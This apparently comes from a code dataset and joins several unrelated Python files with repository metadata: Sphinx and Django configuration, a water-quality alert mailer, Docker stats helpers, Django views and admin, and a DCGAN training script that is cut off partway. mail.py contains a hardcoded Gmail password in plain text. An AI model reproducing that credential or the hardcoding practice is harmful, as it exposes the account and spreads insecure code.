# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
import os
import sys
sys.path.insert(0, os.path.abspath("..//..//hw//hw1"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw2"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw3"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw4"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw5"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw6"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw7"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw8"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw9"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw10"))
sys.path.insert(0, os.path.abspath("..//..//hw//hw11"))
# -- Project information -----------------------------------------------------
project = "Python epam 2021"
copyright = "2021, Dmitry"
author = "Dmitry"
# The full version, including alpha/beta/rc tags
release = "1"
# -- General configuration ---------------------------------------------------
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = ["sphinx.ext.autodoc", "sphinx.ext.napoleon"]
# Napoleon settings
napoleon_google_docstring = True
napoleon_numpy_docstring = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = []
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "nature"
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ["_static"]
| [
"[email protected]"
] | |
0c815faa784cf962acdc946c5bee68a0aada38e0 | a8bf0789f4035d7979439a380b4dd746a0383ed8 | /app/__init__.py | 84a9fa4714fdf3c3d2b6b27dd18b3bb96db237ea | [] | no_license | chaeum/app | 8679d1a8a22cd55ea5f7606a49a2413f8837a308 | 447f2abde7a99ba6f40310f72f788b2dc8e31af3 | refs/heads/master | 2021-01-20T00:21:34.760038 | 2017-04-23T04:38:25 | 2017-04-23T04:38:25 | 89,117,429 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 40 | py | # -*- coding: utf-8 -*-
__all__ = [""]
| [
"[email protected]"
] | |
496b9b1a0ac781eb298c49dd56dddeaa0c0fd2fa | 266fb6ba49327e33ca5b758163a448e8179663dc | /backend/bitter_sound_27405/settings.py | 60170ff259fe2d424ef41917e8ab1bd57166f9ef | [] | no_license | crowdbotics-apps/bitter-sound-27405 | 9be168773f9330011996bd87dee3ae0f773417cb | cba493a67768a176c46e443fe30097657baeaa83 | refs/heads/master | 2023-05-06T02:46:31.203591 | 2021-05-26T00:35:37 | 2021-05-26T00:35:37 | 370,863,369 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,120 | py | """
Django settings for bitter_sound_27405 project.
Generated by 'django-admin startproject' using Django 2.2.2.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.2/ref/settings/
"""
import os
import environ
import logging
env = environ.Env()
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = env.bool("DEBUG", default=False)
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.2/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = env.str("SECRET_KEY")
ALLOWED_HOSTS = env.list("HOST", default=["*"])
SITE_ID = 1
SECURE_PROXY_SSL_HEADER = ("HTTP_X_FORWARDED_PROTO", "https")
SECURE_SSL_REDIRECT = env.bool("SECURE_REDIRECT", default=False)
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.sites'
]
LOCAL_APPS = [
'home',
'modules',
'users.apps.UsersConfig',
]
THIRD_PARTY_APPS = [
'rest_framework',
'rest_framework.authtoken',
'rest_auth',
'rest_auth.registration',
'bootstrap4',
'allauth',
'allauth.account',
'allauth.socialaccount',
'allauth.socialaccount.providers.google',
'django_extensions',
'drf_yasg',
'storages',
# start fcm_django push notifications
'fcm_django',
# end fcm_django push notifications
]
INSTALLED_APPS += LOCAL_APPS + THIRD_PARTY_APPS
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'bitter_sound_27405.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'web_build')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'bitter_sound_27405.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.2/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
if env.str("DATABASE_URL", default=None):
DATABASES = {
'default': env.db()
}
# Password validation
# https://docs.djangoproject.com/en/2.2/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.2/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.2/howto/static-files/
STATIC_URL = '/static/'
MIDDLEWARE += ['whitenoise.middleware.WhiteNoiseMiddleware']
AUTHENTICATION_BACKENDS = (
'django.contrib.auth.backends.ModelBackend',
'allauth.account.auth_backends.AuthenticationBackend'
)
STATIC_ROOT = os.path.join(BASE_DIR, "staticfiles")
STATICFILES_DIRS = [os.path.join(BASE_DIR, 'static'), os.path.join(BASE_DIR, 'web_build/static')]
STATICFILES_STORAGE = 'whitenoise.storage.CompressedManifestStaticFilesStorage'
# allauth / users
ACCOUNT_EMAIL_REQUIRED = True
ACCOUNT_AUTHENTICATION_METHOD = 'email'
ACCOUNT_USERNAME_REQUIRED = False
ACCOUNT_EMAIL_VERIFICATION = "optional"
ACCOUNT_CONFIRM_EMAIL_ON_GET = True
ACCOUNT_LOGIN_ON_EMAIL_CONFIRMATION = True
ACCOUNT_UNIQUE_EMAIL = True
LOGIN_REDIRECT_URL = "users:redirect"
ACCOUNT_ADAPTER = "users.adapters.AccountAdapter"
SOCIALACCOUNT_ADAPTER = "users.adapters.SocialAccountAdapter"
ACCOUNT_ALLOW_REGISTRATION = env.bool("ACCOUNT_ALLOW_REGISTRATION", True)
SOCIALACCOUNT_ALLOW_REGISTRATION = env.bool("SOCIALACCOUNT_ALLOW_REGISTRATION", True)
REST_AUTH_SERIALIZERS = {
# Replace password reset serializer to fix 500 error
"PASSWORD_RESET_SERIALIZER": "home.api.v1.serializers.PasswordSerializer",
}
REST_AUTH_REGISTER_SERIALIZERS = {
# Use custom serializer that has no username and matches web signup
"REGISTER_SERIALIZER": "home.api.v1.serializers.SignupSerializer",
}
# Custom user model
AUTH_USER_MODEL = "users.User"
EMAIL_HOST = env.str("EMAIL_HOST", "smtp.sendgrid.net")
EMAIL_HOST_USER = env.str("SENDGRID_USERNAME", "")
EMAIL_HOST_PASSWORD = env.str("SENDGRID_PASSWORD", "")
EMAIL_PORT = 587
EMAIL_USE_TLS = True
# AWS S3 config
AWS_ACCESS_KEY_ID = env.str("AWS_ACCESS_KEY_ID", "")
AWS_SECRET_ACCESS_KEY = env.str("AWS_SECRET_ACCESS_KEY", "")
AWS_STORAGE_BUCKET_NAME = env.str("AWS_STORAGE_BUCKET_NAME", "")
AWS_STORAGE_REGION = env.str("AWS_STORAGE_REGION", "")
USE_S3 = (
AWS_ACCESS_KEY_ID and
AWS_SECRET_ACCESS_KEY and
AWS_STORAGE_BUCKET_NAME and
AWS_STORAGE_REGION
)
if USE_S3:
AWS_S3_CUSTOM_DOMAIN = env.str("AWS_S3_CUSTOM_DOMAIN", "")
AWS_S3_OBJECT_PARAMETERS = {"CacheControl": "max-age=86400"}
AWS_DEFAULT_ACL = env.str("AWS_DEFAULT_ACL", "public-read")
AWS_MEDIA_LOCATION = env.str("AWS_MEDIA_LOCATION", "media")
AWS_AUTO_CREATE_BUCKET = env.bool("AWS_AUTO_CREATE_BUCKET", True)
DEFAULT_FILE_STORAGE = env.str(
"DEFAULT_FILE_STORAGE", "home.storage_backends.MediaStorage"
)
MEDIA_URL = '/mediafiles/'
MEDIA_ROOT = os.path.join(BASE_DIR, 'mediafiles')
# start fcm_django push notifications
FCM_DJANGO_SETTINGS = {
"FCM_SERVER_KEY": env.str("FCM_SERVER_KEY", "")
}
# end fcm_django push notifications
# Swagger settings for api docs
SWAGGER_SETTINGS = {
"DEFAULT_INFO": f"{ROOT_URLCONF}.api_info",
}
if DEBUG or not (EMAIL_HOST_USER and EMAIL_HOST_PASSWORD):
# output email to console instead of sending
if not DEBUG:
logging.warning("You should setup `SENDGRID_USERNAME` and `SENDGRID_PASSWORD` env vars to send emails.")
EMAIL_BACKEND = "django.core.mail.backends.console.EmailBackend"
| [
"[email protected]"
] | |
662e21ad2ed1290dd365a18efacf200e970e124a | 30eced58206ff84b918f12cb7030a9d719964bdb | /mail.py | 0566acd3c0de794e5468f1d450c1924dfc5a4aa5 | [] | no_license | yassinerabhi/IoT-WQMS | af87a0531c44b360e8f388f8b9b375a9ac8ab163 | cb4924be86534b3015ab5431512dae3f1373510f | refs/heads/master | 2023-06-25T06:58:53.927843 | 2021-07-26T12:04:36 | 2021-07-26T12:04:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,531 | py | """
This is an Email transaction module
Created on Sun, 25th of May 2019
Authors: Isaac Agyen Duffour & John Pk Erbynn
This module handles the alert of any wrong data which is collected and send as email (gmail)
Data can be sent to multiple emails concurrently ie. addresses in lists
Uses Simple Mail Transfer Protocol (SMTP)
Usage:
Parse the json data as an argument unto the send_mail attribute as
send_mail(data)
Expected data should be in the format;
data = {
"temperature": 30,
"turbidity": 7,
"ph": 2,
"water_level": 23
}
run <python mail.py> ... Done! enjoy :)
"""
import smtplib
from email.message import EmailMessage
def send_mail(sensor_data):
print("Error found while scanning data readings.\nSending email ...")
try:
email_address = '[email protected]'
email_password = 'iotaquaaid2019'
email_subject = "WQMS Alert ! :)"
to_email = ['[email protected]', '[email protected]', '[email protected]']
# to_email = '[email protected]'
print("Composing mail ...")
# creating object
msg = EmailMessage()
# email composition
msg['Subject'] = email_subject
msg['From'] = email_address
msg['To'] = to_email
# This identifies specific data being recorded wrongly
print("Catching internal parameter with error...")
check_error = ''
for key, value in sensor_data.items():
if key == "temperature":
if (value < 23) | (value > 34) :
if value < 23:
status = 'Water cold'
else:
status = 'Water hot'
check_error = f" \nTemperature out of range({status}): {value} °C "
print(check_error)
if key == "turbidity":
if (value < 0) | (value > 5) :
check_error = f" \nTurbidity out of range(Suspended particles present): {value} NTU "
print(check_error)
if key == "ph":
if (value < 6) | (value > 10) :
if value < 6:
status = 'acidic water'
else:
status = 'basic water'
check_error = f" \npH out of range({status}): {value} "
print(check_error)
if key == "water_level":
if (value < 5) | (value > 27) :
if value < 5:
status = 'water too low'
else:
status = 'water overflow'
check_error = f" \nWater_level out of range({status}): {value} cm "
print(check_error)
# main content of email
msg.set_content( f'Data collected... \n\n {sensor_data} \n\n {check_error}' )
# logging in and sending email
with smtplib.SMTP_SSL('smtp.gmail.com', 465) as smtp:
smtp.login(email_address, email_password)
smtp.send_message(msg)
print("Email sent successfully !!")
# runs if error occurs while trying to send email
except Exception as err:
print(f"Oops!!...Failed to send mail. {err}")
"""
for testing...run this module
"""
# data = {
# "temperature": 28,
# "turbidity": 4,
# "ph": 2,
# "water_level": 23,
# }
# send_mail(data)
| [
"[email protected]"
] | |
2bbd2fa42d3b7ef77f232286819679441c18a017 | c4e7ab2cef2e88e809ee14f962415552a3f0e62c | /lib/dockerAPI/container_function.py | 87f764d18936c3ef318ee7be48cb332e47c38a3b | [] | no_license | SerhiiRI/svmacm | 33b0cb8a008f2e7e8d7506cf3eb6227b468b3f87 | 827c80f9b6b5d38c89178e2e1b263d5c1f6415fd | refs/heads/master | 2020-04-30T15:09:29.027017 | 2019-07-16T05:19:26 | 2019-07-16T05:19:26 | 176,912,413 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,178 | py | def containerNameId(container_stats:dict) -> (int, int):
return container_stats['name'][1:], container_stats['id']
def containerStatus(container_object) -> str:
return container_object.status
def cpuPercentUsage(container_stats:dict) -> int:
CPU_PERCENT = 0.0
CPUTotalUsage = float(container_stats['cpu_stats'] ['cpu_usage'] ['total_usage'])
PreCPUTotalUsage = float(container_stats['precpu_stats']['cpu_usage'] ['total_usage'])
percpu_core_usage = len (container_stats['cpu_stats'] ['cpu_usage'] ['percpu_usage'])
SystemUsage = float(container_stats['cpu_stats'] ['system_cpu_usage'])
PreSystemUsage = float(container_stats['precpu_stats']['system_cpu_usage'])
cpuDelta = CPUTotalUsage - PreCPUTotalUsage
systemDelta = SystemUsage - PreSystemUsage
if systemDelta > 0.0 and cpuDelta > 0.0:
CPU_PERCENT = (cpuDelta / systemDelta) \
* percpu_core_usage \
* 100.0
return int(CPU_PERCENT)
def networkUsage(container_stats:dict, format:str, interface="eth0") -> (int, int):
"""
By default this function print out to screen only memory
on device eth0, as standard VM configuration
:param container_stats: container status dictionary
:param format: format of output MB, KB, B(default)
:return: (tuple Receive Mem, Transceiver Mem)
"""
rx = float(container_stats['networks'][interface]['rx_bytes'])
tx = float(container_stats['networks'][interface]['tx_bytes'])
if (format is "MB"): (rx, tx) = (rx / (1024 * 1024), tx / (1024 * 1024))
if (format is "KB"): (rx, tx) = (rx / (1024) , tx / (1024))
return (int(rx), int(tx))
def memoryRAM(container_stats:dict) -> int:
#MEM_PERCENT = 0.0
maximum = float(container_stats["memory_stats"]["max_usage"])
used = float(container_stats["memory_stats"]["usage"])
return int(used / maximum * 100)
def imageNameTag(container_obj) -> (str, str):
try:
image, tag = container_obj.image.tags[0].split(":")
except Exception:
image, tag = container_obj.image.tags[0], "-"
return image, tag
| [
"[email protected]"
] | |
8d9c4a094530aa6fd1659cf637aa8f7a717eef3d | 63a5380d51f869a2cab239c18213f819ba23b900 | /Crudapp/views.py | f5ca18081418d0d60f5282821b286d800c899454 | [] | no_license | siva209/CRUD_Operations_Django | 7ced565b873dee1c2b303214964c2131e1e814cc | 73e8823e25566894afaf0120fd89991bdd6a9790 | refs/heads/master | 2023-02-09T09:38:31.195752 | 2021-01-03T15:51:24 | 2021-01-03T15:51:24 | 326,310,242 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 933 | py | from django.shortcuts import render, redirect
# from .models import Student
from .forms import StudentForm
# Create your views here.
from .models import Student
def insert_view(request):
form = StudentForm()
if request.method == 'POST':
form = StudentForm(request.POST)
if form.is_valid():
form.save()
return redirect('/')
return render(request, 'star/Insert.html', {'form': form})
def show_view(request):
students = Student.objects.all()
return render(request, 'star/Show.html', {'students': students})
def delete_view(request,id):
students = Student.objects.get(id=id)
students.delete()
return redirect('/')
def update_view(request,id):
students=Student.objects.get(id=id)
form=StudentForm(request.POST,instance=students)
if form.is_valid():
form.save(commit=True)
return render(request,'star/update.html',{'students':students}) | [
"[email protected]"
] | |
0caf191fb549f59d8228d559861332387941c4a7 | 0852f95cb118158ddaa22ef44456011653200168 | /imonitor/manager/admin.py | 53ce6e36279be468a9599cf005c1b30cb93c2045 | [] | no_license | ultigeo/projectrack | 62695b7590116c2e9d508df8ad8287365d411513 | cc92a175826c2ac801d9f46facda49c140932262 | refs/heads/master | 2021-01-10T02:07:17.959683 | 2016-03-18T09:43:11 | 2016-03-18T09:43:11 | 53,311,808 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 1,339 | py | from django.contrib import admin
from manager.models import *
# Register your models here.
class projectAdmin(admin.ModelAdmin):
pass
class membershipAdmin(admin.ModelAdmin):
pass
class departmentprojectsAdmin(admin.ModelAdmin):
pass
class teamAdmin(admin.ModelAdmin):
pass
class projectshipAdmin(admin.ModelAdmin):
pass
class rolesAdmin(admin.ModelAdmin):
pass
class teamshipAdmin(admin.ModelAdmin):
pass
class tasktypeAdmin(admin.ModelAdmin):
pass
class projecttypeAdmin(admin.ModelAdmin):
pass
class departmentAdmin(admin.ModelAdmin):
pass
class profileAdmin(admin.ModelAdmin):
pass
class taskAdmin(admin.ModelAdmin):
pass
class membersAdmin(admin.ModelAdmin):
pass
admin.site.register(Projects, projectAdmin)
admin.site.register(Members, membersAdmin)
admin.site.register(Membership, membershipAdmin)
admin.site.register(Teams, teamAdmin)
admin.site.register(Tasks, taskAdmin)
admin.site.register(Departments, departmentAdmin)
#admin.site.register(Departmentprojects, departmentprojectsAdmin)
admin.site.register(Profile, profileAdmin)
admin.site.register(Projecttype, projecttypeAdmin)
admin.site.register(Teamship, teamshipAdmin)
admin.site.register(Tasktype, tasktypeAdmin)
admin.site.register(Roles, rolesAdmin)
admin.site.register(Projectship, projectshipAdmin)
| [
"[email protected]"
] | |
c1027f7f2d99905f06539e0831e15ca0d9c30088 | b287837b42e00dc3b6b3b18f47c118f0e90136db | /W23_G_stride/dcgan.py | 4eabd49c410d080bb8d8dc7c0e2134e90667a2b8 | [] | no_license | GoareguerLucas/GAN-SDPC | 5adb0be8a9a3d52f27aad5f8429a5c498d6c5ec1 | 3142daa400502b7c3af73ffe6c00b4fe5a1531ec | refs/heads/master | 2023-03-31T06:21:59.340058 | 2019-11-20T10:25:15 | 2019-11-20T10:25:15 | 178,813,378 | 2 | 0 | null | 2023-03-24T22:48:50 | 2019-04-01T07:56:20 | Python | UTF-8 | Python | false | false | 14,455 | py | import argparse
import os
import numpy as np
import itertools
import torchvision.transforms as transforms
from torchvision.utils import save_image
from torch.utils.tensorboard import SummaryWriter
from torch.utils.data import DataLoader
from torchvision import datasets
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
import torch
import sys
import matplotlib.pyplot as plt
import time
import datetime
parser = argparse.ArgumentParser()
parser.add_argument("-r", "--runs_path", type=str, default='G_stride/stride2/',
help="Dossier de stockage des résultats sous la forme : Experience_names/parameters/")
parser.add_argument("-e", "--n_epochs", type=int, default=100, help="number of epochs of training")
parser.add_argument("-b", "--batch_size", type=int, default=64, help="size of the batches")
parser.add_argument("--lrD", type=float, default=0.00005, help="adam: learning rate for D")
parser.add_argument("--lrG", type=float, default=0.00025, help="adam: learning rate for G")
parser.add_argument("--eps", type=float, default=0.5, help="batchnorm: espilon for numerical stability")
parser.add_argument("--b1", type=float, default=0.5, help="adam: decay of first order momentum of gradient")
parser.add_argument("--b2", type=float, default=0.999, help="adam: decay of first order momentum of gradient")
parser.add_argument("--lrelu", type=float, default=0.000001, help="LeakyReLU : alpha")
parser.add_argument("--latent_dim", type=int, default=32, help="dimensionality of the latent space")
parser.add_argument("--kernels_size", type=int, default=9, help="Taille des kernels")
parser.add_argument("--padding", type=int, default=4, help="Taille du padding")
parser.add_argument("-i", "--img_size", type=int, default=128, help="size of each image dimension")
parser.add_argument("--channels", type=int, default=3, help="number of image channels")
parser.add_argument("-s", "--sample_interval", type=int, default=10, help="interval between image sampling")
parser.add_argument("--sample_path", type=str, default='images')
parser.add_argument("-m", "--model_save_interval", type=int, default=150,
help="interval between image sampling. If model_save_interval > n_epochs : no save")
parser.add_argument('--model_save_path', type=str, default='models')
parser.add_argument('--load_model', action="store_true",
help="Load model present in model_save_path/Last_*.pt, if present.")
parser.add_argument("-d", "--depth", action="store_true",
help="Utiliser si utils.py et SimpsonsDataset.py sont deux dossier au dessus.")
parser.add_argument("-v", "--verbose", action="store_true",
help="Afficher des informations complémentaire.")
parser.add_argument("--GPU", type=int, default=0, help="Identifiant du GPU à utiliser.")
opt = parser.parse_args()
print(opt)
# Particular import
depth = ""
if opt.depth == True:
depth = "../"
sys.path.append(depth + "../") # ../../GAN-SDPC/
from SimpsonsDataset import SimpsonsDataset, FastSimpsonsDataset
from utils import *
from plot import *
# Dossier de sauvegarde
os.makedirs(opt.model_save_path, exist_ok=True)
# Gestion du time tag
try:
tag = datetime.datetime.now().isoformat(sep='_', timespec='seconds')
except TypeError:
# Python 3.5 and below
# 'timespec' is an invalid keyword argument for this function
tag = datetime.datetime.now().replace(microsecond=0).isoformat(sep='_')
tag = tag.replace(':','.')
cuda = True if torch.cuda.is_available() else False
NL = nn.LeakyReLU(opt.lrelu, inplace=True)
opts_conv = dict(kernel_size=opt.kernels_size, stride=2, padding=opt.padding, padding_mode='zeros')
channels = [64, 128, 256, 512]
class Generator(nn.Module):
def __init__(self, verbose=opt.verbose):
super(Generator, self).__init__()
def generator_block(in_filters, out_filters):
block = [nn.UpsamplingNearest2d(scale_factor=opts_conv['stride']*2), nn.Conv2d(in_filters, out_filters, kernel_size=opts_conv['kernel_size'], stride=opts_conv['stride'], padding=opts_conv['padding'], padding_mode=opts_conv['padding_mode']), nn.BatchNorm2d(out_filters, opt.eps), NL]
return block
self.verbose = verbose
self.init_size = opt.img_size // opts_conv['stride']**4
self.l1 = nn.Sequential(nn.Linear(opt.latent_dim, channels[3] * self.init_size ** 2), NL)
self.conv1 = nn.Sequential(*generator_block(channels[3], channels[2]),)
self.conv2 = nn.Sequential(*generator_block(channels[2], channels[1]),)
self.conv3 = nn.Sequential(*generator_block(channels[1], channels[0]),)
self.conv4 = nn.Sequential(*generator_block(channels[0], 3),nn.Tanh(),)
"""self.conv_blocks = nn.Sequential(
nn.Conv2d(channels[0], opt.channels, 3, stride=1, padding=1),
nn.Tanh(),
)"""
def forward(self, z):
if self.verbose: print("G")
# Dim : opt.latent_dim
out = self.l1(z)
if self.verbose: print("l1 out : ",out.shape)
out = out.view(out.shape[0], channels[3], self.init_size, self.init_size)
# Dim : (channels[3], opt.img_size/8, opt.img_size/8)
if self.verbose: print("View out : ",out.shape)
out = self.conv1(out)
# Dim : (channels[3]/2, opt.img_size/4, opt.img_size/4)
if self.verbose: print("Conv1 out : ",out.shape)
out = self.conv2(out)
# Dim : (channels[3]/4, opt.img_size/2, opt.img_size/2)
if self.verbose: print("Conv2 out : ",out.shape)
out = self.conv3(out)
# Dim : (channels[3]/8, opt.img_size, opt.img_size)
if self.verbose: print("Conv3 out : ",out.shape)
img = self.conv4(out)
# Dim : (opt.chanels, opt.img_size, opt.img_size)
if self.verbose: print("img out : ", img.shape)
return img
def _name(self):
return "Generator"
class Discriminator(nn.Module):
def __init__(self,verbose=opt.verbose):
super(Discriminator, self).__init__()
def discriminator_block(in_filters, out_filters, bn=True):
block = [nn.Conv2d(in_filters, out_filters, **opts_conv), NL]#, nn.Dropout2d(0.25)
if bn:
block.append(nn.BatchNorm2d(out_filters, opt.eps))
return block
self.verbose = verbose
self.conv1 = nn.Sequential(*discriminator_block(opt.channels, channels[0], bn=False),)
self.conv2 = nn.Sequential(*discriminator_block(channels[0], channels[1]),)
self.conv3 = nn.Sequential(*discriminator_block(channels[1], channels[2]),)
self.conv4 = nn.Sequential(*discriminator_block(channels[2], channels[3]),)
# The height and width of downsampled image
self.init_size = opt.img_size // opts_conv['stride']**4
self.adv_layer = nn.Sequential(nn.Linear(channels[3] * self.init_size ** 2, 1))#, nn.Sigmoid()
def forward(self, img):
if self.verbose:
print("D")
print("Image shape : ",img.shape)
out = self.conv1(img)
print("Conv1 out : ",out.shape)
out = self.conv2(out)
print("Conv2 out : ",out.shape)
out = self.conv3(out)
print("Conv3 out : ",out.shape)
out = self.conv4(out)
print("Conv4 out : ",out.shape)
out = out.view(out.shape[0], -1)
print("View out : ",out.shape)
validity = self.adv_layer(out)
print("Val out : ",validity.shape)
else:
# Dim : (opt.chanels, opt.img_size, opt.img_size)
out = self.conv1(img)
# Dim : (channels[3]/8, opt.img_size/2, opt.img_size/2)
out = self.conv2(out)
# Dim : (channels[3]/4, opt.img_size/4, opt.img_size/4)
out = self.conv3(out)
# Dim : (channels[3]/2, opt.img_size/4, opt.img_size/4)
out = self.conv4(out)
# Dim : (channels[3], opt.img_size/8, opt.img_size/8)
out = out.view(out.shape[0], -1)
validity = self.adv_layer(out)
# Dim : (1)
return validity
def _name(self):
return "Discriminator"
# Loss function
adversarial_loss = torch.nn.BCEWithLogitsLoss()
sigmoid = nn.Sigmoid()
# Initialize generator and discriminator
generator = Generator()
discriminator = Discriminator()
print_network(generator)
print_network(discriminator)
if cuda:
#print("Nombre de GPU : ",torch.cuda.device_count())
if torch.cuda.device_count() > opt.GPU:
torch.cuda.set_device(opt.GPU)
generator.cuda()
discriminator.cuda()
adversarial_loss.cuda()
# Initialize weights
generator.apply(weights_init_normal)
discriminator.apply(weights_init_normal)
# Configure data loader
dataloader = load_data(depth + "../../cropped_clear/cp/", opt.img_size, opt.batch_size, rand_hflip=True)
# Optimizers
optimizer_G = torch.optim.Adam(generator.parameters(), lr=opt.lrG, betas=(opt.b1, opt.b2))
optimizer_D = torch.optim.Adam(discriminator.parameters(), lr=opt.lrD, betas=(opt.b1, opt.b2))
Tensor = torch.cuda.FloatTensor if cuda else torch.FloatTensor
# ----------
# Load models
# ----------
start_epoch = 1
if opt.load_model == True:
start_epoch = load_models(discriminator, optimizer_D, generator, optimizer_G, opt.n_epochs, opt.model_save_path)
# ----------
# Tensorboard
# ----------
path_data1 = depth + "../runs/" + opt.runs_path
path_data2 = depth + "../runs/" + opt.runs_path + tag[:-1] + "/"
# Les runs sont sauvegarder dans un dossiers "runs" à la racine du projet, dans un sous dossiers opt.runs_path.
os.makedirs(path_data1, exist_ok=True)
os.makedirs(path_data2, exist_ok=True)
writer = SummaryWriter(log_dir=path_data2)
# ----------
# Training
# ----------
nb_batch = len(dataloader)
nb_epochs = 1 + opt.n_epochs - start_epoch
hist = init_hist(nb_epochs, nb_batch)
save_dot = 1 # Nombre d'epochs avant de sauvegarder un point des courbes
batch_on_save_dot = save_dot*len(dataloader)
# Vecteur z fixe pour faire les samples
N_samples = 24
fixed_noise = Variable(Tensor(np.random.normal(0, 1, (N_samples, opt.latent_dim))))
t_total = time.time()
for j, epoch in enumerate(range(start_epoch, opt.n_epochs + 1)):
t_epoch = time.time()
for i, (imgs, _) in enumerate(dataloader):
t_batch = time.time()
# ---------------------
# Train Discriminator
# ---------------------
# Adversarial ground truths
valid_smooth = Variable(Tensor(imgs.shape[0], 1).fill_(float(np.random.uniform(0.9, 1.0, 1))), requires_grad=False)
valid = Variable(Tensor(imgs.size(0), 1).fill_(1), requires_grad=False)
fake = Variable(Tensor(imgs.size(0), 1).fill_(0), requires_grad=False)
# Configure input
real_imgs = Variable(imgs.type(Tensor))
# Generate a batch of images
z = np.random.normal(0, 1, (imgs.shape[0], opt.latent_dim))
z = Variable(Tensor(z))
gen_imgs = generator(z)
optimizer_D.zero_grad()
# Real batch
# Discriminator descision
d_x = discriminator(real_imgs)
# Measure discriminator's ability to classify real from generated samples
real_loss = adversarial_loss(d_x, valid_smooth)
# Backward
real_loss.backward()
# Fake batch
# Discriminator descision
d_g_z = discriminator(gen_imgs.detach())
# Measure discriminator's ability to classify real from generated samples
fake_loss = adversarial_loss(d_g_z, fake)
# Backward
fake_loss.backward()
d_loss = real_loss + fake_loss
optimizer_D.step()
# -----------------
# Train Generator
# -----------------
optimizer_G.zero_grad()
# New discriminator descision, Since we just updated D
d_g_z = discriminator(gen_imgs)
# Loss measures generator's ability to fool the discriminator
g_loss = adversarial_loss(d_g_z, valid)
# Backward
g_loss.backward()
optimizer_G.step()
print(
"[Epoch %d/%d] [Batch %d/%d] [D loss: %f] [G loss: %f] [Time: %fs]"
% (epoch, opt.n_epochs, i+1, len(dataloader), d_loss.item(), g_loss.item(), time.time()-t_batch)
)
# Compensation pour le BCElogits
d_x = sigmoid(d_x)
d_g_z = sigmoid(d_g_z)
# Save Losses and scores for Tensorboard
save_hist_batch(hist, i, j, g_loss, d_loss, d_x, d_g_z)
# Tensorboard save
iteration = i + nb_batch * j
writer.add_scalar('g_loss', g_loss.item(), global_step=iteration)
writer.add_scalar('d_loss', d_loss.item(), global_step=iteration)
writer.add_scalar('d_x_mean', hist["d_x_mean"][i], global_step=iteration)
writer.add_scalar('d_g_z_mean', hist["d_g_z_mean"][i], global_step=iteration)
writer.add_scalar('d_x_cv', hist["d_x_cv"][i], global_step=iteration)
writer.add_scalar('d_g_z_cv', hist["d_g_z_cv"][i], global_step=iteration)
writer.add_histogram('D(x)', d_x, global_step=iteration)
